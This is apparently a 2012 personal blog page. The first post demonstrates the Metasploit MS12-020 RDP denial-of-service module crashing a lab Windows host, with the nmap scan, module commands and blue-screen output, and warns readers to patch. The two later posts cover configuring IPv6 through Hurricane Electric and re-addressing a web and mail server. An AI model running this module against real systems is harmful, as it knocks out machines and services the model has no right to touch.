MS12-020 Metasploit Fun

25 03 2012

Metasploit contains a module to DoS Windows hosts with RDP enabled using the PoC code – patched in MS12-020

Well, it works ūüėÄ – short & sweet….

The only known code in the wild is for DoS – so far no remote code execution – but one step generally leads to the other pretty quickly – so disable / patch / protect your RDP ASAP.

Now you see it:

root@bt:~/vpn/darknet# nmap 10.6.6.1 -p 3389

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-03-25 17:51 EST
Nmap scan report for 10.6.6.1
Host is up (0.0035s latency).
PORT STATE SERVICE
3389/tcp open ms-term-serv

Nmap done: 1 IP address (1 host up) scanned in 0.37 seconds

64 bytes from 10.6.6.1: icmp_seq=99 ttl=127 time=2.90 ms
64 bytes from 10.6.6.1: icmp_seq=100 ttl=127 time=4.13 ms
64 bytes from 10.6.6.1: icmp_seq=101 ttl=127 time=2.85 ms

Now you dont:

root@bt:/opt/metasploit/msf3# ./msfconsole
msf > info auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids) > show options
msf auxiliary(ms12_020_maxchannelids) > set RHOST 10.6.6.1
RHOST => 10.6.6.1
msf auxiliary(ms12_020_maxchannelids) > exploit

[*] 10.6.6.1:3389 – Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS
[*] 10.6.6.1:3389 – 210 bytes sent
[*] 10.6.6.1:3389 – Checking RDP status…
[+] 10.6.6.1:3389 seems down
[*] Auxiliary module execution completed
msf auxiliary(ms12_020_maxchannelids) >

From 172.16.0.1 icmp_seq=131 Destination Host Unreachable
From 172.16.0.1 icmp_seq=132 Destination Host Unreachable
From 172.16.0.1 icmp_seq=133 Destination Host Unreachable

w00t BSOD !! РDoS (Crashdump & Reboot)





IPv6 rebooted – web & smtp server

14 03 2012

Now that I had a new IPv6 allocation from tunnelbroker.net – it was time to get the server re-addressed & reachable from the outside world.

Apache was already configured to listen on all IPv4 & IPv6 addresses so all I needed to do was change the address, test connectivity & restart apache

sudo ip addr add 2001:470:489e::100/64 dev eth0
sudo route –inet6 add default gateway 2001:470:489e::1
ping6 2001:470:489e::1

Dont forget to update your nameserver

sudo vi /etc/resolv.conf
ping6 ipv6.google.com

Restart apache & postfix services

sudo /etc/init.d/apache2 stop
sudo /etc/init.d/apache2 start
sudo /etc/init.d/postfix stop
sudo /etc/init.d/postfix start

Update your DNS record with the new address & test connection.
You can either test from another IPv6 connected host (like a VPS)

ash@vertex:~$ dig aaaa public.blackundertone.com +short
2001:470:489e::100
ash@vertex:~$ curl public.blackundertone.com

Or use one of the many publicly available test servers – like http://ipv6-test.com/validate.php

Its as simple as that. Now my server was once again reachable via IPv6 Рall this effort to get back to where I was.

Next time РI cover the DNS forward & reverse fun as well as why I needed to transfer my domain from namecheap.com free DNS hosting to the free DNS hosting provided by Hurricane Electric @ dns.he.net





IPv6 rebooted – IPv6 SAGE Certification Project (part1)

13 03 2012

IPv6 Certification Badge for blackundertone

Well Рits official РI am an IPv6 consumer. I have a public facing IPv6 web & smtp server Рand I have passed the requirements of the Hurricane Electric (he.net) IPv6 certification program to the SAGE level Рhttp://ipv6.he.net/certification/

I already had IPv6 through Freenet6 Рas I detailed in my previous IPv6 post here so I began the IPv6 certification program, and ran through the first few basic levels.

  • I can reach the site with IPv6- Check
  • he.net can reach my IPv6 website – Check
  • he.net can send me email (had to stand up postfix for this one) – Check

This got me to the Administrator level – anyone with IPv6 connectivity can easily get here – simply have a reachable IPv6 website & mail server.

This is where the fun came in. To get to the next level (Professional) – I needed a working reverse DNS entry for my mailserver. Now while this sounds simple – freenet6 doesnt appear to provide an easy way to configure reverse DNS entries for the IPv6 range they provide you – bummer.

My Astaro box provides built in support for several tunnel brokers gogo6 Freenet6, Hurricane Electric & SixXS

I had exhausted my energy trying to setup reverse DNS with Freenet6, so off to Hurricane Electric I went Рseemed a logical choice considering I was doing their certification anyway. Signup was simple & within minutes I had a new IPv6 allocation. They initially allocate a single /64 Рbut once you have enabled your connection Рyou can request a /48 Рwhich of course I did.

So – now that I have a new allocation, here is how I configured it on my network.

In Astro: Interfaces & Routing -> IPv6 (Click Enable) then from the Tunnel Broker tab, simply enter your tunnelbroker.net username & password.

Minutes later, the /64 range on your tunnelbroker.net account page should appear in the global tab.

A couple of tests later & I confirmed I could ping IPv6 addresses from my Astaro box (example here using the ns2.he.net nameserver address)

I decided to use the inital /64 I was allocated as the range for my Internal hosts, and then break up the /48 into subnets for other zones.

By far the easiest way to use IPv6 is let the “Stateless Auto Configuration” work its magic. It doesnt require DHCP, allows hosts to automatically find the router & get an address – pretty much works as it says on the box.

Simply add an IPv6 address to the FW interface you want to run IPv6 on, then advertise the subnet out.

Suddenly your internal hosts will be getting IPv6 addresses & will be EXTERNALLY REACHABLE <— This is important. Make sure you setup your firewall rules, host protection etc etc. I will not cover this step, but you need to ensure you understand that as soon as your box has an IPv6 address – it is publically routable from the outside world.

Repeat the addition of¬†an¬†IPv6 address (from another /64 subnet – broken up out of your /48 you requested from tunnelbroker.net) to the DMZ interface(s). I am not enabling the “Stateless Auto¬†Configuration” on my DMZ segments, I am just manually assigning addresses to the couple of boxes in there.

Right – that covers the move to Hurricane Electric & how to re-address the internal & DMZ segments.

Next steps are re-addressing my public web & smtp server, updating the DNS forward & reverse zone entries Рand what is needed to complete the rest of the certification.